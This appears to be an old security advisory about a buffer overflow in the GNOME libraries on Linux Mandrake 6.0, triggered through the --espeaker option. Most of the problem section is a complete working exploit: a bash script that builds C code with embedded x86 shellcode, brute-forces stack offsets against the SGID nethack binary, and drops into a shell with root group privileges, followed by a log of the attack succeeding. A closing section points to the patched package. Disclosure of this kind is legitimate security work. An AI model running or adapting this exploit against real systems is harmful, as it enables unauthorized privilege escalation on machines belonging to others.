COMMAND

    GNOME

SYSTEMS AFFECTED

    Linux Mandrake

PROBLEM

    Brock Tellier found  following.  Virtually  any program using  the
    GNOME libraries is  vulnerable to a  buffer overflow attack.   The
    attack comes in the form:

        /path/to/gnome/prog --enable-sound --espeaker=$80bytebuffer

    The  following  exploit  should  work  against  any GNOME program,
    though it was tested  on (the irony) /usr/games/nethack,  which is
    SGID root by default on RH6.0.  An attack on any program will look
    something like this:

    [xnec@redhack gnox]$ uname -a; cat /etc/redhat-release; id
    Linux redhack 2.2.9-19mdk #1 Wed May 19 19:53:00 GMT 1999 i686 unknown
    Linux Mandrake release 6.0 (Venus)
    uid=501(xnec) gid=501(xnec) groups=501(xnec)
    [xnec@redhack gnox]$ ./gnox.sh
    Building /tmp/gnox.c...
    ...done!
    Building /tmp/gn.c...
    ...done!
    Compiling /tmp/gnox...
    ...done!
    Compiling /tmp/gn...
    ...done!
    Launching attack...

    ... pages and pages of segfaults

    Generic GNOME exploit for Linux x86
    Brock Tellier btellier@webley.com

    Using addr: 0xbffff988  buflen:90  offset:208
    Can't resolve host name "ë^1AFF
                                                                      °
                                                                      óV

    I1UØ@IèÜÿÿÿ/tmp/gnùÿ¿ùÿ¿Xúÿ¿Z"!
    before: uid=501, euid=501, gid=501, egid=0
    after: uid=501, euid=501, gid=0, egid=0
    [xnec@redhack gnomehack]$ id
    uid=501(xnec) gid=0(root) groups=501(xnec)

    gnox.sh follows:

    #!/bin/bash
    # Generic exploit for GNOME apps under Linux x86
    # Our overflowed buffer is just 80 bytes so we'll have to get our settings
    # just so.  Hence the shell script.
    #
    # This should work against any su/gid GNOME program.  The only one that comes
    # with RH6.0 that is su/gid root is (the irony is killing me) nethack.
    #
    # Change the /usr/games/nethack statement in the while loop below to exploit
    # a different program.
    #
    # -Brock Tellier btellier@webley.com

    echo "Building /tmp/gnox.c..."
    cat > /tmp/gnox.c <<EOF
    /*
     * Generic GNOME overflow exploit for Linux x86, tested on RH6.0
     * Will work against any program using the GNOME libraries in the form
     * Keep your BUFSIZ at 90 and only modify your offset
     *
     */


    #include <stdlib.h>
    #include <stdio.h>

    char gnoshell[]= /* Generic Linux x86 shellcode modified to run our
    program */
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/tmp/gn";

    #define LEN 120
    #define BUFLEN 90 /* no need to change this */
    #define NOP 0x90
    #define DEFAULT_OFFSET 300

    unsigned long get_sp(void) {

    __asm__("movl %esp, %eax");

    }

    void main(int argc, char *argv[]) {

    int offset, i;
    int buflen = BUFLEN;
    long int addr;
    char buf[BUFLEN];
    char gnobuf[LEN];
    if(argc > 2) {
      fprintf(stderr, "Error: Usage: %s <offset>\n", argv[0]);
      exit(0);
    }
     else if (argc == 2){
       offset=atoi(argv[1]);
     }
     else {
       offset=DEFAULT_OFFSET;
     }


    addr=get_sp();

    fprintf(stderr, "Generic GNOME exploit for Linux x86\n");
    fprintf(stderr, "Brock Tellier btellier@webley.com\n\n");
    fprintf(stderr, "Using addr: 0x%x  buflen:%d  offset:%d\n", addr-offset,
    buflen, offset);

    memset(buf,NOP,buflen);
    memcpy(buf+35,gnoshell,strlen(gnoshell));
    for(i=35+strlen(gnoshell);i<buflen-4;i+=4)
            *(int *)&buf[i]=addr-offset;

    sprintf(gnobuf, "--enable-sound --espeaker=%s", buf);
    for(i=0;i<strlen(gnobuf);i++)
            putchar(gnobuf[i]);

    }
    EOF

    echo "...done!"

    echo "Building /tmp/gn.c..."

    cat > /tmp/gn.c <<EOF
    #include <unistd.h>

    void main() {
      printf("before: uid=%d, euid=%d, gid=%d, egid=%d\n", getuid(),
    geteuid(), getgid(), getegid());

      setreuid(geteuid(), geteuid());
      setregid(getegid(), getegid());

      printf("after: uid=%d, euid=%d, gid=%d, egid=%d\n", getuid(),
    geteuid(), getgid(), getegid());

      system("/bin/bash");
    }
    EOF

    echo "...done!"

    echo "Compiling /tmp/gnox..."
    gcc -o /tmp/gnox /tmp/gnox.c
    echo "...done!"

    echo "Compiling /tmp/gn..."
    gcc -o /tmp/gn /tmp/gn.c
    echo "...done!"

    echo "Launching attack..."

    offset=0

    while [ $offset -lt 10000 ]; do
        /usr/games/nethack `/tmp/gnox $offset`
        offset=`expr $offset + 4`
    done

    echo "...done!"

SOLUTION

    One  could  duplicate  this  for  gnome-libs  1.0.8  but  not with
    gnome-libs 1.0.15.   The fixed package  is available from  updates
    mirror, see:

        http://www.linux-mandrake.com/en/fupdates.php3

    or launch  MandrakeUpdate.   Nota the  security is  only with  6.0
    version, since  6.1 the  package was  removed.   It is  adviced to
    remove completely the package from  your system if you are  maniac
    of security (and who aren't ?).